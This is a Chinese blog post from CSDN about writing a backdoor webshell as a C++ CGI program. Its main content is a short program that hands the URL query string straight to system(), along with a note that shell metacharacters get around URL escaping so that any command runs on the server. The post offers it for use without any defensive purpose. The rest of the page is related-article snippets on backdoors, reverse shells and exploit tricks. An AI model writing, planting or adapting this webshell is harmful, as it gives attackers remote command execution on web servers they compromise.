使用C++编写基于WEB CGI的后门漏洞

最新推荐文章于 2021-05-18 01:12:10 发布
最新推荐文章于 2021-05-18 01:12:10 发布
阅读量3.2w 收藏
点赞数 1
分类专栏: 网络安全 C/C++ WEB 文章标签: 网络安全 WEB 编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_27180763/article/details/84953297
版权
网络安全 同时被 3 个专栏收录
77 篇文章 4 订阅
订阅专栏
C/C++
32 篇文章 1 订阅
订阅专栏
WEB
22 篇文章 1 订阅
订阅专栏

先上代码:

#include <stdio.h>
#include <stdlib.h>
#include <string>
using namespace std;
int main()
{
	printf("Content-Type:text/plain;charset=utf-8\r\n\r\n");
	printf("<html>");
	printf("<h1>Welcome to this WEBshell</h1>\r\n");
	char* str = getenv("QUERY_STRING");
	if(!str){
		printf("<h3>please check your network!</h3>");
	}else{
		system(str);
	}
	printf("</html>")
	return 0;
}

核心函数是getenv,获取当前页面的所有环境变量,这里我们只要使用shell元字符解决url转义问题,配合shell命令即可实现任意命令执行。

程序小黑
关注
专栏目录
SSRF漏洞
weixin_49472648的博客
09-02 2314
因为fastcgi一个record的大小是有限的,作用也是单一的,所以我们需要在一个TCP流里传输多个record。PHP-FPM未授权访问漏洞,PHP-FPM默认监听9000端口,如果这个端口暴露在公网,则我们可以自己构造fastcgi协议,和fpm进行通信。也就是接收POST的内容,这个我们可以在FastCGI协议的body控制为恶意代码,这样就在理论上实现了php-fpm任意代码执行的攻击。(1)攻击者无需认证访问到内部数据,可能导致敏感信息泄露,黑客也可以恶意执行flushall来清空所有数据;
红队系列-网络安全知识锦囊(持续更新)
最新发布
aming小老弟
11-09 1202
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
PS1 Savegame漏洞利用-C/C++开发
05-27
索尼PlayStation 1的tonyhax软件备份加载程序利用东西。要在存储卡上安装,您需要索尼索尼PlayStation 1的通用tonyhax SPL保存tonyhax软件备份加载器利用东西。要在存储卡上安装,您需要d同时需要通用的tonyhax SPL保存特定于游戏的保存。 安装时:如果您使用任何形式的可视存储卡编辑器(例如OrionSoft的PS1存储卡管理器,Dexdrive等),请考虑使用MCS文件。 如果要使用PS2控制台和uLaunchELF复制它,则需要使用原始文件。 名称很重要-请勿重命名。 游戏区号MC
安全之路 —— C/C++实现后门的服务自启动
dengdao1372的博客
08-24 322
简介 Windows NT系统后门要实现自启动,有许多种方法,例如注册表自启动,映像劫持技术,SVCHost自启动以及本章节介绍的服务自启动等方法,其中服务自启动相对于上述其他三种需要修改注册表的启动方式而言更不容易被发现。 C++代码样例 ////////////////////////////////////////////////////////////// // // Fil...
c++ cmdshell反弹型后门
07-01
反弹型后门 把自身注入到IE中 反向链接服务端 用NC 来监听就可以 大家可以发挥想象 把其他代码补全 (Rebound-type back door to reverse itself into the link into IE to listen with the NC server can imagine we can play the other code completion)
简单后门 c++版 当年LION写 现详细注释
许落
02-04 1383
////////////////////////////////////////////////////////////////////////////simple door//二〇一零年 二月四号//author: LION  //路子注释//广西桂林 EST///////////////////////////////////////////////////////////////
VC++打造后门.
11-07
VC++打造后门.由于文件太大分两部分上传,下载完后阅读
无需sendmail:巧用LD_PRELOAD突破disable_functions
Coisini的博客
12-03 939
摘要:千辛万苦拿到的 webshell 居然无法执行系统命令,怀疑服务端 disable_functions 禁用了命令执行函数,通过环境变量 LD_PRELOAD 劫持系统函数,却又发现目标根本没安装 sendmail,无法执行命令的 webshell 是无意义的,看我如何突破! | 半月前逛“已黑网站列表”时复审一小电商网站,“列表”中并未告知漏洞详情,简单浏览了下功能,只有注册、登录、下单...
模糊测试--强制性安全漏洞发掘
热门推荐
软件性能测试专栏
01-20 2万+
文档分享地址链接:http://pan.baidu.com/share/link?shareid=2723797392&uk=2485812037 密码:r43x 前 言 我知道"人类和鱼类能够和平共处" 。 --George W. Bush, 2000年9月29日 简介 模糊测试的概念至少已经流传了20年,但是直到最近才引起广泛的关注。安全漏洞困扰了许多流行的客户端应用程序
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5552
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
VC++开发的远程控制系统,有一个简单的木马后门
05-10
一个简单的远程控制系统,实现了屏幕传输,鼠标控制,并且基于简单木马的自启动
一步一步教你使用CGI实现一个简单的后门
meishadevs的个人博客
11-21 6904
程序实例1:
C语言,后门程序,C语言做的后门【反连】
weixin_39814378的博客
05-18 100
该楼层疑似违规已被系统折叠隐藏此楼查看此楼/*Protocol of connectionConnect : CONNConnected Success : SUCCReboot : REBT 暂时不可用Upload : UPLDDownload : DNLDDestroy : DTOY 暂时不可用Help : HELP 暂时不可用OK : START TO TRANSFER ...
c++ 利用winpcap编制简单的路由程序_腾讯QQ升级程序存在漏洞,被利用植入后门病毒...
weixin_35940165的博客
12-24 134
近日,火绒安全团队根据用户反馈,发现一起利用腾讯QQ升级漏洞植入后门病毒的攻击事件,攻击者可利用该漏洞下发任意恶意代码。火绒团队称:截止到目前,最新版QQ(包括TIM、QQ、QQ轻聊版、QQ国际版等等)都存在该漏洞。经分析,该事件中被利用的升级漏洞曾在2015年就被公开披露过,之后腾讯对该漏洞进行修复并增加了校验逻辑。但从目前来看,QQ此处升级逻辑仍存在逻辑漏洞。另外,在排除本地劫持的可能后(LS...
C语言,后门程序,C++映像劫持后门实例分析
weixin_30317869的博客
05-18 255
// freeheart.cpp : Defines the entry point for the console application.//学习交流使用,违法使用后果自负。// by:cnblogs.com/blogg time 2013.5.24// argv 0 = freeheart.exe// argv 1 = -i// argv 2 = name.exe// argv 3 = 1 ...
C++中的端口复用后门编写
桂林哈秋 - 我想学编程
03-29 1926
原文:http://hi.baidu.com/biweilun/blog/item/8c13b5197fb9514143a9adad.html端口复用后门很多人认为挺有难度的,要强行将Windows正在使用的开放端口占掉,然后插入我们的后门,一般人都以为必须在ring0下面进行,其实完全没有必要,下面给出一段我研究的代码,去除了几行关键的代码,防止居心不良的人直接拿去编译。加上了注释,将就着看
51.cgi网站后门
weixin_30876945的博客
02-02 111
运行截图: html开发: 1 <html> 2 <body> 3 <form id="form" name="form" method="post" action="../cgi-bin/run.cgi"> 4 <p></p> 5 ...
C++网络安全入侵检测技术模块及源程序代码
06-13 3361
马云说过,现在这个时代,数据成了最宝贵的资源,每个公司的数据库都是重点防护的。尤其是阿里巴巴,宣称没有人可以攻破自己的安全网络,因为有太多牛人在里面。 一个VC++ 网络入侵检测模块及程序代码,源代码完整,包括所需控件都在压缩包内,用VC编写网络软件的时候用得上。 CMainFrame* p_Frame; //保持筐架类的指针 CEdit* m_pEdit; //保存编辑框类的指针...
C++编写木马全过程
weixin_40286351的博客
01-04 3928
首先是&lt;FONT color=magenta  size=5&gt;工具的选择。目前流行的开发工具有C++Builder、VC、VB和Delphi,这里我们选用C++Builder(以下简称BCB);VC虽然好,但GUI设计太复杂,为了更好地突出我的例子,集中注意力在&lt;FONT color=magenta  size=5&gt;的基本原理上,我们选用可视化的BCB;Delphi也不错,...
使用Visual C++和MAPI编写邮件程序指南
"本文主要介绍了如何使用C++和MAPI在Visual C++环境下编写电子邮件程序。MAPI是Windows操作系统内置的接口,分为SMAPI、Simple MAPI和完整的MAPI,其中SMAPI适用于基本的收发邮件需求。文章重点讨论了使用SMAPI来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

程序小黑

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值